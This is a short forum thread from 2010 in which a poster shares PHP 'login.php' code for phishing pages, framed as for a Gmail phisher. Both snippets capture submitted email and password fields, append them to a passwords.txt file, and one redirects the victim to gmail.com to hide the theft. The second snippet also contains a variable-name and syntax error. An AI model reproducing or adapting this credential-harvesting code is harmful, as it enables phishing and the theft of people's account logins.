So i made a custom login.php to log your accounts to a file.
Only use this for gmail phisher
This works for any phisher.Code:$stuff = "Email: " . $_POST["Email"] . "Password: " . $_POST["Passwd"] . "\r\n\n"; $file = fopen("passwords.txt","a"); fwrite($file,$stuff); fclose($file);
Code:$file = fopen("passwords.txt","a"); foreach($_POST as $variable => $value) { fwrite($f, $variable . " = " . $value . "\r\n\n"; } fclose($file); header("location: http://gmail.com");
Results 1 to 2 of 2
Thread: [PHP]Some Custom Login.php
- 18 Jan. 2010 10:43am #1
[PHP]Some Custom Login.php
- 20 Jan. 2010 01:59am #2